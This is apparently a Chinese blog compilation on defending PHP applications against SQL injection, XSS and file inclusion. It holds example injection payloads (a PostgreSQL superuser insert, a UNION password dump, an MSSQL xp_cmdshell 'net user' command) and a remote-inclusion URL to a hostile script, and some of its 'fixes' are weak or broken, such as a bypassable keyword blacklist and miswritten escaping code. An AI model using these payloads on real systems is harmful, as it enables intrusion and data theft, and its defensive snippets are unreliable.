防sql注入

[转]SQL 注入
SQL 注入
很多 web 开发者没有注意到 SQL 查询是可以被篡改的，因而把 SQL 查询当作可信任的命令。殊不知道，SQL 查询可以绕开访问控制，从而绕过身份验证和权限检查。更有甚者，有可能通过 SQL 查询去运行主机操作系统级的命令。
直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQL 语句的技术，从而达到取得隐藏数据，或覆盖关键的值，甚至执行数据库主机操作系统命令的目的。这是通过应用程序取得用户输入并与静态参数组合成 SQL 查询来实现的。下面将会给出一些真实的例子。
由于在缺乏对输入的数据进行验证，并且使用了超级用户或其它有权创建新用户的数据库帐号来连接，攻击者可以在数据库中新建一个超级用户。
Example#1 一段实现数据分页显示的代码……也可以被用作创建一个超级用户（PostgreSQL系统）。
复制PHP内容到剪贴板
PHP代码:
$offset = $argv[0]; // 注意，没有输入验证！
$query  = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$result = pg_query($conn, $query);

一般的用户会点击 $offset 已被斌值的“上一页”、“下一页”的链接。原本代码只会认为 $offset 是一个数值。然而，如果有人尝试把以下语句先经过 urlencode() 处理，然后加入URL中的话：
0;
insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)
    select 'crack', usesysid, 't','t','crack'
    from pg_shadow where usename='postgres';
--
那么他就可以创建一个超级用户了。注意那个 0; 只不过是为了提供一个正确的偏移量以便补充完整原来的查询，使它不要出错而已。
Note: -- 是 SQL 的注释标记，一般可以使用来它告诉 SQL 解释器忽略后面的语句。

对显示搜索结果的页面下手是一个能得到密码的可行办法。攻击者所要做的只不过是找出哪些提交上去的变量是用于 SQL 语句并且处理不当的。而这类的变量通常都被用于 SELECT 查询中的条件语句，如 WHERE, ORDER BY, LIMIT 和 OFFSET。如果数据库支持 UNION 构造的话，攻击者还可能会把一个完整的 SQL 查询附加到原来的语句上以便从任意数据表中得到密码。因此，对密码字段加密是很重要的。
Example#2 显示文章……以及一些密码（任何数据库系统）
复制PHP内容到剪贴板
PHP代码:
$query  = "SELECT id, name, inserted, size FROM products
                  WHERE size = '$size'
                  ORDER BY $order LIMIT $limit, $offset;";
$result = odbc_exec($conn, $query);

可以在原来的查询的基础上添加另一个 SELECT 查询来获得密码：
'
union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable;
--
假如上述语句（使用 ' 和 --）被加入到 $query 中的任意一个变量的话，那么就麻烦了。
SQL 中的 UPDATE 也会受到攻击。这种查询也可能像上面的例子那样被插入或附加上另一个完整的请求。但是攻击者更愿意对 SET 子句下手，这样他们就可以更改数据表中的一些数据。这种情况下必须要知道数据库的结构才能修改查询成功进行。可以通过表单上的变量名对字段进行猜测，或者进行暴力破解。对于存放用户名和密码的字段，命名的方法并不多。
Example#3 从重设密码……到获得更多权限（任何数据库系统）
复制PHP内容到剪贴板
PHP代码:
$query = "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";

但是恶意的用户会把 ' or uid like'%admin%'; -- 作为变量的值提交给 $uid 来改变 admin 的密码，或者把 $pwd 的值提交为 "hehehe', admin='yes', trusted=100 "（后面有个空格）去获得更多的权限。这样做的话，查询语句实际上就变成了：
复制PHP内容到剪贴板
PHP代码:
// $uid == ' or uid like'%admin%'; --
$query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%'; --";
// $pwd == "hehehe', admin='yes', trusted=100 "
$query = "UPDATE usertable SET pwd='hehehe', admin='yes', trusted=100 WHERE
...;";

下面这个可怕的例子将会演示如何在某些数据库上执行系统命令。
Example#4 攻击数据库所在主机的操作系统（MSSQL Server）
复制PHP内容到剪贴板
PHP代码:
$query  = "SELECT * FROM products WHERE id LIKE '%$prod%'";
$result = mssql_query($query);

如果攻击提交 a%' exec master..xp_cmdshell 'net user test testpass /ADD' -- 作为变量 $prod的值，那么 $query 将会变成
复制PHP内容到剪贴板
PHP代码:
$query  = "SELECT * FROM products
                    WHERE id LIKE '%a%'
                    exec master..xp_cmdshell 'net user test testpass /ADD'--";
$result = mssql_query($query);

MSSQL 服务器会执行这条 SQL 语句，包括它后面那个用于向系统添加用户的命令。如果这个程序是以 sa 运行而 MSSQLSERVER 服务又有足够的权限的话，攻击者就可以获得一个系统帐号来访问主机了。
Note: 虽然以上的例子是针对某一特定的数据库系统的，但是这并不代表不能对其它数据库系统实施类似的攻击。使用不同的方法，各种数据库都有可能遭殃。

预防措施
也许有人会自我安慰，说攻击者要知道数据库结构的信息才能实施上面的攻击。没错，确实如此。但没人能保证攻击者一定得不到这些信息，一但他们得到了，数据库有泄露的危险。如果你在用开放源代码的软件包来访问数据库，比如论坛程序，攻击者就很容得到到相关的代码。如果这些代码设计不良的话，风险就更大了。
这些攻击总是建立在发掘安全意识不强的代码上的。所以，永远不要信任外界输入的数据，特别是来自于客户端的，包括选择框、表单隐藏域和 cookie。就如上面的第一个例子那样，就算是正常的查询也有可能造成灾难。
永远不要使用超级用户或所有者帐号去连接数据库。要用权限被严格限制的帐号。
检查输入的数据是否具有所期望的数据格式。PHP 有很多可以用于检查输入的函数，从简单的变量函数和字符类型函数（比如 is_numeric()，ctype_digit()）到复杂的 Perl 兼容正则表达式函数都可以完成这个工作。
如果程序等待输入一个数字，可以考虑使用 is_numeric() 来检查，或者直接使用 settype() 来转换它的类型，也可以用 sprintf() 把它格式化为数字。
Example#5 一个实现分页更安全的方法
复制PHP内容到剪贴板
PHP代码:
settype($offset, 'integer');
$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
// 请注意格式字符串中的 %d，如果用 %s 就毫无意义了
$query = sprintf("SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET %d;",
                 $offset);

使用数据库特定的敏感字符转义函数（比如 mysql_escape_string() 和 sql_escape_string()）把用户提交上来的非数字数据进行转义。如果数据库没有专门的敏感字符转义功能的话 addslashes() 和 str_replace() 可以代替完成这个工作。看看第一个例子，此例显示仅在查询的静态部分加上引号是不够的，查询很容易被攻破。
要不择手段避免显示出任何有关数据库的信心，尤其是数据库结构。参见错误报告和错误处理函数。
也可以选择使用数据库的存储过程和预定义指针等特性来抽象数库访问，使用户不能直接访问数据表和视图。但这个办法又有别的影响。
除此之外，在允许的情况下，使用代码或数据库系统保存查询日志也是一个好办法。显然，日志并不能防止任何攻击，但利用它可以跟踪到哪个程序曾经被尝试攻击过。日志本身没用，要查阅其中包含的信息才行。毕竟，更多的信息总比没有要好。

老话题今天又研究了一下：

目前我觉得有效的办法还是只有一个，图片验证码。

其它几种行不通的方法：
1.判断HTTP_REFERER，实际上这个信息是浏览器给服务器的，所以完全可以模拟
2.判断session 代码如下：
<?php
session_start();
if(isset($_POST['name']) && !empty($_POST['name'])){
if($_POST['check']==$_SESSION['check']){
  echo '正常访问';
}
else{
echo '外部访问';

}
}
$token=md5(uniqid(rand(),true));
$_SESSION['check']=$token;

?>
<FORM METHOD=POST ACTION="">
<INPUT TYPE="text" NAME="name"><INPUT TYPE="text" NAME="check" value="<?php echo $token;?>"><INPUT TYPE="submit">
</FORM>

PHP程序员最易犯10种错误(转)
PHP是个伟大的web开发语言，灵活的语言，但是看到php程序员周而复始的犯的一些错误。我做了下面这个列表，列出了PHP程序员经常犯的10中错误，大多数和安全相关。看看你犯了几种

1.不转意html entities

 

  一个基本的常识：所有不可信任的输入（特别是用户从form中提交的数据） ，输出之前都要转意。

 

echo $_GET['usename'] ;

 

这个例子有可能输出：

 

<script>/*更改admin密码的脚本或设置cookie的脚本*/</script>

 

这是一个明显的安全隐患，除非你保证你的用户都正确的输入。

 

如何修复 ：

 

我们需要将"< ",">","and" 等转换成正确的HTML表示(< , >', and ")，函数htmlspecialchars 和 htmlentities()正是干这个活的。

 

正确的方法：

 

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

 

 

2. 不转意SQL输入
我曾经在一篇文章中最简单的防止sql注入的方法(php+mysql中)讨论过这个问题并给出了一个简单的方法 。有人对我说，他们已经在php.ini中将magic_quotes设置为On，所以不必担心这个问题，但是不是所有的输入都是从$_GET, $_POST或 $_COOKIE中的得到的！
如何修复：

和在最简单的防止sql注入的方法(php+mysql中)中一样我还是推荐使用mysql_real_escape_string()函数

正确做法：
<?php
$sql = "UPDATE users SET
name='.mysql_real_escape_string($name).'
WHERE id='.mysql_real_escape_string ($id).'";
mysql_query($sql);
?>

 

 

3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie()
遇到过这个警告吗?"warning: Cannot add header information - headers already sent [....]

每次从服务器下载一个网页的时候，服务器的输出都分成两个部分：头部和正文。
头部包含了一些非可视的数据，例如cookie。头部总是先到达。正文部分包括可视的html，图片等数据。
如果output_buffering设置为Off，所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发，而在部署到另一个环境中去的时候，output_buffering的设置可能不一样。结果转向停止了，cookie和session都没有正确的设置........。

如何修复:
确保在输出之前调用http-header相关的函数，并且令output_buffering = Off
。

 

4. Require 或 include 的文件使用不安全的数据
再次强调：不要相信不是你自己显式声明的数据。不要 Include 或 require 从$_GET, $_POST 或 $_COOKIE 中得到的文件。

 

例如:
index.php
<?
//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>

 

现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt
来获取你的机密信息，或执行一个PHP脚本。

如果allow_url_fopen=On，你更是死定了：
试试这个输入：
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件，改变密码，删除文件等等。只要你能想得到。

如何修复：
你必须自己控制哪些文件可以包含在的include或require指令中。

下面是一个快速但不全面的解决方法：
<?
//Include only files that are allowed.
$allowedFiles = array('file1.txt','file2.txt','file3.txt');
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit('not allowed');
}
?>

 

5. 语法错误
语法错误包括所有的词法和语法错误，太常见了，以至于我不得不在这里列出。解决办法就是认真学习PHP的语法，仔细一点不要漏掉一个括号，大括号，分号，引号。还有就是换个好的编辑器，就不要用记事本了！

 

6.很少使用或不用面向对象
很多的项目都没有使用PHP的面向对象技术，结果就是代码的维护变得非常耗时耗力。PHP支持的面向对象技术越来越多，越来越好，我们没有理由不使用面向对象。

 

7. 不使用framework
95% 的PHP项目都在做同样的四件事: Create, edit, list 和delete. 现在有很多MVC的框架来帮我们完成这四件事，我们为何不使用他们呢？

 

 

8. 不知道PHP中已经有的功能
PHP的核心包含很多功能。很多程序员重复的发明轮子。浪费了大量时间。编码之前搜索一下PHP mamual，在google上检索一下，也许会有新的发现！PHP中的exec()是一个强大的函数，可以执行cmd shell，并把执行结果的最后一行以字符串的形式返回。考虑到安全可以使用EscapeShellCmd()

 

 

9.使用旧版本的PHP

很多程序员还在使用PHP4，在PHP4上开发不能充分发挥PHP的潜能，还存在一些安全的隐患。转到PHP5上来吧，并不费很多功夫。大部分PHP4程序只要改动很少的语句甚至无需改动就可以迁移到PHP5上来。根据http://www.nexen.net的调查 只有12%的PHP服务器使用PHP5，所以有88%的PHP开发者还在使用PHP4.

 

 

10.对引号做两次转意

见过网页中出现\'或\'"吗？这通常是因为在开发者的环境中magic_quotes 设置为off，而在部署的服务器上magic_quotes =on. PHP会在 GET, POST 和 COOKIE中的数据上重复运行addslashes() 。
原始文本：
It's a string

 

magic quotes on :
It\'s a string
又运行一次
addslashes():
It\\'s a string

 

HTML输出:
It\'s a string

还有一种情况就是，用户一开始输入了错误的登录信息，服务器检测到错误输入后，输出同样的form要求用户再次输入，导致用户的输入转意两次！

<?php
/*************************
说明：
判断传递的变量中是否含有非法字符
如$_POST、$_GET
功能：
防注入
**************************/
//要过滤的非法字符
$ArrFiltrate=array("''''",";","union");
//出错后要跳转的url,不填则默认前一页
$StrGoUrl="";
//是否存在数组中的值
function FunStringExist($StrFiltrate,$ArrFiltrate){
foreach ($ArrFiltrate as $key=>$value){
    if (eregi($value,$StrFiltrate)){
        return true;
    }
  }
return false;
}
//合并$_POST 和 $_GET
if(function_exists(array_merge)){
    $ArrPostAndGet=array_merge($HTTP_POST_VARS,$HTTP_GET_VARS);
}else{
    foreach($HTTP_POST_VARS as $key=>$value){
        $ArrPostAndGet[]=$value;
    }
    foreach($HTTP_GET_VARS as $key=>$value){
        $ArrPostAndGet[]=$value;
    }
}
//验证开始
foreach($ArrPostAndGet as $key=>$value){
    if (FunStringExist($value,$ArrFiltrate)){
        echo "<script language="javascript">alert("非法字符");</script>";
        if (empty($StrGoUrl)){
        echo "<script language="javascript">history.go(-1);</script>";
        }else{
        echo "<script language="javascript">window.location="".$StrGoUrl."";</script>";
        }
        exit;
    }
}
?>

保存为checkpostandget.php
然后在每个php文件前加include(“checkpostandget.php“);即可
 

*
 字符串检查类
 *@author  sanshi
    QQ:35047205
    Email:sanshi0815@tom.com
    MSN:sanshi0815@tom.com

*/
class checkBase
{
 function checkBase()
 {
 }
 /*
 用来检查字符串是否为空
 *@param $str 检查的字段
 *@param $isStr 如果字段有可能唯一字符是数字或者bool类型时使用
 为空的时候返回true
 */
 function strIsNull($str,$isStr=true)
 {
  return $isStr?(empty($str)?true:false)
      :(isset($str)?false:true);
 }
 /*
 字符串与正则表达式做比较
 @param $str   要比较的字符串
 @param $pattern     要比对的正则
 与正则比对上了返回true
 */
 function strComparePattern($str,$pattern)
 {
  if(ereg($pattern,$str))
  {
   //找到了返回
   return true;
  }
  return false;
 }
 /*
 判断字符串长短
 @param $str 要检查的字符串
 @param $max 最大长度
 @param $min 最小长度
 符合要求返回true
 */
 function strCompareLen($str,$max,$min=1)
 {
  $len = strlen($str);
  $max=empty($max)?$len:$max;
  return ($len>$max || $len<$min)?false:true;
 }
 /*
 信息处理，跳转到页面
 @param $page     跳转到的页面   
 @param $msg      提示信息
 */
 function msg($page,$msg)
 {
  $msg = empty($msg)?'''''''':"?msg=".base64_encode($msg);
  $url=$page.$msg;
  if(@header("Location:".$url))
  {
     echo "<meta http-equiv=refresh content=''''0;url=".$url."''''>";
  }
  exit();
 }
 
}